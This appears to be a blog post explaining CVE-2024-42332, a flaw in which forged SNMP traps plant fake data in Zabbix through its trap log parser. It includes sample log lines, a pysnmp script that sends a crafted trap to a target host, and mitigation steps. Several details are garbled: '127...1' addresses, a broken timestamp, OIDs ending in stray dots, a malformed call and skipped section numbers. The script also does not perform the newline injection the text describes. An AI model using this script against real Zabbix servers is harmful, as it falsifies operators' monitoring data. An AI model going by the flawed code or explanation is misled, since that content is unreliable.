CVE-2024-42332 - How Forged SNMP Traps Poison Zabbix UI With Fake Data

*Written by a security researcher for exclusive insights into Zabbix SNMP trap handling gone wrong.*

1. Introduction

Most folks trust their network monitoring tools, especially well-known ones like Zabbix. But what if attackers could poison what you see in your dashboards with forged SNMP trap data? That is what CVE-2024-42332 is all about—a smart but scary way to mess with your monitoring by exploiting how Zabbix processes SNMP trap logs.

2. What is CVE-2024-42332?

CVE-2024-42332 is a vulnerability discovered in Zabbix (an open-source monitoring solution), caused by insecure parsing of SNMP trap logs. Attackers can send specially crafted SNMP trap messages with unexpected formatting—essentially, with extra newlines and forged data—so when Zabbix parses the log, it gets tricked into reading and showing *fake* values as if they were real SNMP data.

> *In simple terms, attackers can make Zabbix UI show information that never existed, just by sending "funky" SNMP traps.*

3. How the SNMP Trap Log is Vulnerable

Zabbix can be set up to collect SNMP trap messages for certain items, saving these to a log file (like /var/log/snmptrapd.log). Later, Zabbix parses this file to update values for SNMP items. The problem is, Zabbix expects a certain format, and just picks up text lines as they show up.

If an attacker controls or can influence SNMP traps (for example, knows the SNMP community string), they can:

Suppose the log normally looks like

2024-06-07 10:15:11 localhost [UDP: [192.168.1.100]:52242->[127...1]] # SNMPv2-MIB::sysUpTime. = Timeticks: (879473) 2:26:34.73
# SNMPv2-MIB::snmpTrapOID. = OID: IF-MIB::linkDown
# IF-MIB::ifDescr.2 = STRING: eth1

But a malicious trap adds *extra* logs

2024-06-07 10:15:11 attackerhost [UDP: [10.10.10.5]:52242->[127...1]] # SNMPv2-MIB::sysUpTime. = Timeticks: (100) :10:00.00
# SNMPv2-MIB::snmpTrapOID. = OID: FAKE-MIB::alert
# FAKE-MIB::forgedItem.1 = STRING: ALERT - System PWNED!
# ZABBIX-TRAP-LOG-EXTRA-DATA
# SOME-FORGED-FIELD = STRING: GARBAGE

*This "extra" data can be picked up by Zabbix as if it was real.*

Trapd logs the entire message (even the weird or extra lines) into the trap log file.

4. Zabbix server's SNMP trap handler reads the log and parses *all* lines (even the malicious, extra lines), and assigns the data to SNMP items as if legitimate.

5. Code Example: Crafting a Malicious SNMP Trap

Here's a simple Python code using pysnmp to craft such a trap (for demo/educational purposes only):

from pysnmp.hlapi import *

# Replace below with the target Zabbix host IP and your own (or known) community string
target = '192.168.1.150'
community = 'public'

errorIndication, errorStatus, errorIndex, varBinds = next(
    sendNotification(
        SnmpEngine(),
        CommunityData(community),
        UdpTransportTarget((target, 162)),
        ContextData(),
        'trap',
        # Add both legitimate and extra data
        [
            # Legit OID/value
            ObjectType(ObjectIdentity('SNMPv2-MIB', 'snmpTrapOID', ), 'IF-MIB::linkDown'),

            # Fake OIDs/values (Zabbix may log and interpret these as well)
            ObjectType(ObjectIdentity('1.3.6.1.4.1.9999.1.1.1.'), OctetString('FAKE-DATA')),
            ObjectType(ObjectIdentity('1.3.6.1.4.1.9999.1.1.2.'), OctetString('System Compromised!')),
        ]
    )
)

if errorIndication:
    print("Error:", errorIndication)
else:
    print("Malicious trap sent!")

Note: You can craft raw UDP packets or use other SNMP tools (like snmptrap) to include *extra newline-separated* fields that get appended to the log.

SNMP authentication off or weak—public community string, default credentials, etc.

> *If you're using SNMPv2c with public/private as your community, you're at real risk!*

7. Mitigation and Fixes

- Upgrade Zabbix: Check for official patches/advisories related to CVE-2024-42332.
- Harden SNMP: Never use public/private—use strong, random community strings.

Audit Zabbix SNMP Items: Especially those set as text—validate if you actually need them.

- Log Monitoring: Watch for weird or unexpected OID/value entries in your SNMP trap logs.

8. Further Reading & References

- CVE Details: NIST NVD Entry
- Zabbix Issue Tracker: SUPPORT-24121
- SNMP Trapd Documentation: net-snmp.org
- Zabbix SNMP Documentation: Zabbix Docs

In Closing

CVE-2024-42332 is a clear reminder that log parsing should never be trusted blindly. If attackers can inject data structures that get read as valid input, attacks are only a matter of time. If you rely on SNMP traps and Zabbix, make sure you aren’t showing the attackers’ messages as your own!

Timeline

Published on: 11/27/2024 12:15:21 UTC